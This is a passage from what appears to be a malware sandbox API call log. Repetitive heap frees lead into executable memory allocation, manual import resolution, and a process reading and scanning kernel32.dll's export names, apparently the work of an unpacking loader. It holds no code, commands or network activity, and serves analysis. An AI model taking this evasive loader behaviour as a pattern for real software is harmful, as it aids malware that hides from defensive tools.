| out: hHeap=0x470000) returned 1 [0131.503] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x319cd50 | out: hHeap=0x470000) returned 1 [0131.503] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x31aff60 | out: hHeap=0x470000) returned 1 [0131.503] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x31c3170 | out: hHeap=0x470000) returned 1 [0131.503] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x31d6380 | out: hHeap=0x470000) returned 1 [0131.506] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x31e9590 | out: hHeap=0x470000) returned 1 [0131.509] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x31fc7a0 | out: hHeap=0x470000) returned 1 [0131.509] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x320f9b0 | out: hHeap=0x470000) returned 1 [0131.509] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3222bc0 | out: hHeap=0x470000) returned 1 [0131.509] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3235dd0 | out: hHeap=0x470000) returned 1 [0131.509] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3248fe0 | out: hHeap=0x470000) returned 1 [0131.509] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x325c1f0 | out: hHeap=0x470000) returned 1 [0131.514] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x326f400 | out: hHeap=0x470000) returned 1 [0131.514] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3282610 | out: hHeap=0x470000) returned 1 [0131.515] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3295820 | out: hHeap=0x470000) returned 1 [0131.515] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x32a8a30 | out: hHeap=0x470000) returned 1 [0131.515] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x32bbc40 | out: hHeap=0x470000) returned 1 [0131.515] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x32cee50 | out: hHeap=0x470000) returned 1 [0131.516] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x32e2060 | out: hHeap=0x470000) returned 1 [0131.516] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x32f5270 | out: hHeap=0x470000) returned 1 [0131.516] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3308480 | out: hHeap=0x470000) returned 1 [0131.516] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x331b690 | out: hHeap=0x470000) returned 1 [0131.520] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x332e8a0 | out: hHeap=0x470000) returned 1 [0131.522] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3341ab0 | out: hHeap=0x470000) returned 1 [0131.522] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3354cc0 | out: hHeap=0x470000) returned 1 [0131.522] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3367ed0 | out: hHeap=0x470000) returned 1 [0131.747] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x337b0e0 | out: hHeap=0x470000) returned 1 [0131.747] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x338e2f0 | out: hHeap=0x470000) returned 1 [0131.747] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x33a1500 | out: hHeap=0x470000) returned 1 [0131.747] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x33b4710 | out: hHeap=0x470000) returned 1 [0131.749] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x33c7920 | out: hHeap=0x470000) returned 1 [0131.750] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x33dab30 | out: hHeap=0x470000) returned 1 [0131.750] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x33edd40 | out: hHeap=0x470000) returned 1 [0131.750] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3400f50 | out: hHeap=0x470000) returned 1 [0131.750] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3414160 | out: hHeap=0x470000) returned 1 [0131.750] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3427370 | out: hHeap=0x470000) returned 1 [0131.750] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x343a580 | out: hHeap=0x470000) returned 1 [0131.758] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x344d790 | out: hHeap=0x470000) returned 1 [0131.761] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x34609a0 | out: hHeap=0x470000) returned 1 [0131.761] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3473bb0 | out: hHeap=0x470000) returned 1 [0131.764] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3486dc0 | out: hHeap=0x470000) returned 1 [0131.764] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3499fd0 | out: hHeap=0x470000) returned 1 [0131.764] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x34ad1e0 | out: hHeap=0x470000) returned 1 [0131.764] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x34c03f0 | out: hHeap=0x470000) returned 1 [0131.766] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x34d3600 | out: hHeap=0x470000) returned 1 [0131.767] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x34e6810 | out: hHeap=0x470000) returned 1 [0131.767] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x34f9a20 | out: hHeap=0x470000) returned 1 [0131.767] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x350cc30 | out: hHeap=0x470000) returned 1 [0131.767] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x351fe40 | out: hHeap=0x470000) returned 1 [0131.767] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3533050 | out: hHeap=0x470000) returned 1 [0131.771] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3546260 | out: hHeap=0x470000) returned 1 [0131.774] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3559470 | out: hHeap=0x470000) returned 1 [0131.774] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x356c680 | out: hHeap=0x470000) returned 1 [0131.774] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x357f890 | out: hHeap=0x470000) returned 1 [0131.778] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3592aa0 | out: hHeap=0x470000) returned 1 [0131.778] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x35a5cb0 | out: hHeap=0x470000) returned 1 [0131.779] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x35b8ec0 | out: hHeap=0x470000) returned 1 [0131.779] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x35cc0d0 | out: hHeap=0x470000) returned 1 [0131.779] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x35df2e0 | out: hHeap=0x470000) returned 1 [0131.779] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x35f24f0 | out: hHeap=0x470000) returned 1 [0131.779] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3605700 | out: hHeap=0x470000) returned 1 [0132.046] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3618910 | out: hHeap=0x470000) returned 1 [0132.047] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x362bb20 | out: hHeap=0x470000) returned 1 [0132.047] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x363ed30 | out: hHeap=0x470000) returned 1 [0132.061] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3651f40 | out: hHeap=0x470000) returned 1 [0132.061] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3665150 | out: hHeap=0x470000) returned 1 [0132.064] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3678360 | out: hHeap=0x470000) returned 1 [0132.066] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x368b570 | out: hHeap=0x470000) returned 1 [0132.069] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x369e780 | out: hHeap=0x470000) returned 1 [0132.069] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x36b1990 | out: hHeap=0x470000) returned 1 [0132.069] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x36c4ba0 | out: hHeap=0x470000) returned 1 [0132.070] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x36d7db0 | out: hHeap=0x470000) returned 1 [0132.070] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x36eafc0 | out: hHeap=0x470000) returned 1 [0132.070] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x36fe1d0 | out: hHeap=0x470000) returned 1 [0132.070] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x37113e0 | out: hHeap=0x470000) returned 1 [0132.070] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x37245f0 | out: hHeap=0x470000) returned 1 [0132.073] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3737800 | out: hHeap=0x470000) returned 1 [0132.074] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x374aa10 | out: hHeap=0x470000) returned 1 [0132.074] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x375dc20 | out: hHeap=0x470000) returned 1 [0132.074] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3770e30 | out: hHeap=0x470000) returned 1 [0132.077] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3784040 | out: hHeap=0x470000) returned 1 [0132.079] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3797250 | out: hHeap=0x470000) returned 1 [0132.081] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x37aa460 | out: hHeap=0x470000) returned 1 [0132.081] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x37bd670 | out: hHeap=0x470000) returned 1 [0132.082] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x37d0880 | out: hHeap=0x470000) returned 1 [0132.082] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x37e3a90 | out: hHeap=0x470000) returned 1 [0132.082] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x37f6ca0 | out: hHeap=0x470000) returned 1 [0132.082] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3809eb0 | out: hHeap=0x470000) returned 1 [0132.084] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x381d0c0 | out: hHeap=0x470000) returned 1 [0132.085] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x38302d0 | out: hHeap=0x470000) returned 1 [0132.085] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x38434e0 | out: hHeap=0x470000) returned 1 [0132.088] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x38566f0 | out: hHeap=0x470000) returned 1 [0132.089] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3869900 | out: hHeap=0x470000) returned 1 [0132.089] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x387cb10 | out: hHeap=0x470000) returned 1 [0132.092] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x388fd20 | out: hHeap=0x470000) returned 1 [0132.094] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x38a2f30 | out: hHeap=0x470000) returned 1 [0132.292] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x38b6140 | out: hHeap=0x470000) returned 1 [0132.292] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x38c9350 | out: hHeap=0x470000) returned 1 [0132.293] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x38dc560 | out: hHeap=0x470000) returned 1 [0132.293] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x38ef770 | out: hHeap=0x470000) returned 1 [0132.294] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3902980 | out: hHeap=0x470000) returned 1 [0132.294] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3915b90 | out: hHeap=0x470000) returned 1 [0132.294] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3928da0 | out: hHeap=0x470000) returned 1 [0132.296] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x393bfb0 | out: hHeap=0x470000) returned 1 [0132.297] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x394f1c0 | out: hHeap=0x470000) returned 1 [0132.297] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x39623d0 | out: hHeap=0x470000) returned 1 [0132.299] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x39755e0 | out: hHeap=0x470000) returned 1 [0132.301] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x39887f0 | out: hHeap=0x470000) returned 1 [0132.303] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x399ba00 | out: hHeap=0x470000) returned 1 [0132.305] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x39aec10 | out: hHeap=0x470000) returned 1 [0132.307] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x39c1e20 | out: hHeap=0x470000) returned 1 [0132.308] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x39d5030 | out: hHeap=0x470000) returned 1 [0132.308] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x39e8240 | out: hHeap=0x470000) returned 1 [0132.309] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x39fb450 | out: hHeap=0x470000) returned 1 [0132.309] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3a0e660 | out: hHeap=0x470000) returned 1 [0132.311] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3a21870 | out: hHeap=0x470000) returned 1 [0132.311] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3a34a80 | out: hHeap=0x470000) returned 1 [0132.313] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3a47c90 | out: hHeap=0x470000) returned 1 [0132.314] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3a5aea0 | out: hHeap=0x470000) returned 1 [0132.316] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3a6e0b0 | out: hHeap=0x470000) returned 1 [0132.317] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3a812c0 | out: hHeap=0x470000) returned 1 [0132.319] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3a944d0 | out: hHeap=0x470000) returned 1 [0132.323] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3aa76e0 | out: hHeap=0x470000) returned 1 [0132.474] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3aba8f0 | out: hHeap=0x470000) returned 1 [0132.479] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3acdb00 | out: hHeap=0x470000) returned 1 [0132.479] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3ae0d10 | out: hHeap=0x470000) returned 1 [0132.480] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3af3f20 | out: hHeap=0x470000) returned 1 [0132.481] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3b07130 | out: hHeap=0x470000) returned 1 [0132.482] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3b1a340 | out: hHeap=0x470000) returned 1 [0132.484] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3b2d550 | out: hHeap=0x470000) returned 1 [0132.486] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3b40760 | out: hHeap=0x470000) returned 1 [0132.489] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3b53970 | out: hHeap=0x470000) returned 1 [0132.492] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4bb100 | out: hHeap=0x470000) returned 1 [0132.492] VirtualAlloc (lpAddress=0x180000000, dwSize=0x19000, flAllocationType=0x3000, flProtect=0x40) returned 0x180000000 [0132.495] VirtualProtect (in: lpAddress=0x1800122e0, dwSize=0xc8, flNewProtect=0x4, lpflOldProtect=0x14f750 | out: lpflOldProtect=0x14f750*=0x40) returned 1 [0132.495] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x7ffc5ecd0000 [0132.497] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ExitProcess") returned 0x7ffc5ecf4d80 [0132.497] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0132.497] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0132.497] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcessHeap") returned 0x7ffc5eced4f0 [0132.497] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapAlloc") returned 0x7ffc5f8352d0 [0132.497] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapFree") returned 0x7ffc5eceb480 [0132.497] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapReAlloc") returned 0x7ffc5f8339f0 [0132.498] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatA") returned 0x7ffc5ecf6bb0 [0132.498] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatW") returned 0x7ffc5ecfa250 [0132.498] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcmpA") returned 0x7ffc5ecf3690 [0132.498] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyA") returned 0x7ffc5ecf45d0 [0132.498] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyW") returned 0x7ffc5ecf6d30 [0132.498] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpynW") returned 0x7ffc5ecf91a0 [0132.498] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenA") returned 0x7ffc5ecf0c60 [0132.498] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenW") returned 0x7ffc5eced6d0 [0132.498] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x7ffc5e960000 [0132.498] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfA") returned 0x7ffc5e984d50 [0132.498] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfW") returned 0x7ffc5e9881e0 [0132.498] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x7ffc5e7b0000 [0132.499] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnA") returned 0x7ffc5e7c5b00 [0132.499] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnW") returned 0x7ffc5e7bd780 [0132.499] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrDupA") returned 0x7ffc5e7c5c30 [0132.499] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnA") returned 0x7ffc5e7c5ca0 [0132.499] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnW") returned 0x7ffc5e7c5cb0 [0132.499] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x49e5b0 | out: hHeap=0x470000) returned 1 [0132.499] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4be3b0 | out: hHeap=0x470000) returned 1 [0132.503] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x481440 | out: hHeap=0x470000) returned 1 [0132.505] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0132.505] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0132.505] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0132.505] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0132.505] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0132.505] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 [0132.650] GetProcessHeap () returned 0x470000 [0132.650] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x68) returned 0x47b640 [0132.651] GetProcessHeap () returned 0x470000 [0132.651] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x489bb0 [0132.651] GetProcessHeap () returned 0x470000 [0132.652] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x48) returned 0x4810d0 [0132.652] GetModuleHandleA (lpModuleName="Kernel32.dll") returned 0x7ffc5ecd0000 [0132.652] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0132.652] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryW") returned 0x7ffc5ecf50f0 [0132.652] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryA") returned 0x7ffc5ecf74d0 [0132.652] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="FreeLibrary") returned 0x7ffc5ecf4810 [0132.652] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleW") returned 0x7ffc5ecf3d40 [0132.652] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0132.652] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x7ffc5ecd0000 [0132.652] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0132.652] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0132.652] GetModuleFileNameA (in: hModule=0x7ffc5ecd0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0132.653] CreateFileA (lpFileName="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0132.653] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0132.653] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0132.653] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=705584) returned 1 [0132.653] GetProcessHeap () returned 0x470000 [0132.653] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xac430) returned 0x49d060 [0132.655] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0132.655] ReadFile (in: hFile=0x134, lpBuffer=0x49d060, nNumberOfBytesToRead=0xac430, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x49d060*, lpNumberOfBytesRead=0x14f5a4*=0xac430, lpOverlapped=0x0) returned 1 [0132.674] CloseHandle (hObject=0x134) returned 1 [0132.674] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0132.680] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockShared") returned 1 [0132.680] lstrcmpA (lpString1="ActivateActCtx", lpString2="ActivateActCtx") returned 0 [0132.680] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0132.680] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0132.680] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtx") returned 1 [0132.680] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtxWorker") returned 0 [0132.680] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockExclusive") returned 1 [0132.680] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockShared") returned 1 [0132.680] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtx") returned 1 [0132.680] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtxWorker") returned 1 [0132.680] lstrcmpA (lpString1="AddAtomA", lpString2="AddAtomA") returned 0 [0132.680] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockExclusive") returned 1 [0132.680] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockShared") returned 1 [0132.681] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtx") returned 1 [0132.681] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtxWorker") returned 1 [0132.681] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomA") returned 1 [0132.681] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomW") returned 0 [0132.681] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockExclusive") returned 1 [0132.681] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockShared") returned 1 [0132.681] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtx") returned 1 [0132.681] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtxWorker") returned 1 [0132.681] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomA") returned 1 [0132.681] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomW") returned 1 [0132.681] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddConsoleAliasA") returned 0 [0132.681] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockExclusive") returned 1 [0132.681] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockShared") returned 1 [0132.681] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtx") returned 1 [0132.681] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtxWorker") returned 1 [0132.681] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomA") returned 1 [0132.681] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomW") returned 1 [0132.681] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasA") returned 1 [0132.681] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasW") returned 0 [0132.681] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0132.681] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0132.681] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0132.681] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0132.681] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0132.681] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0132.681] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0132.681] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0132.681] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0132.681] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 0 [0132.682] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockExclusive") returned 1 [0132.682] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockShared") returned 1 [0132.682] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtx") returned 1 [0132.682] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtxWorker") returned 1 [0132.682] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomA") returned 1 [0132.682] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomW") returned 1 [0132.682] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasA") returned 1 [0132.682] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasW") returned 1 [0132.682] 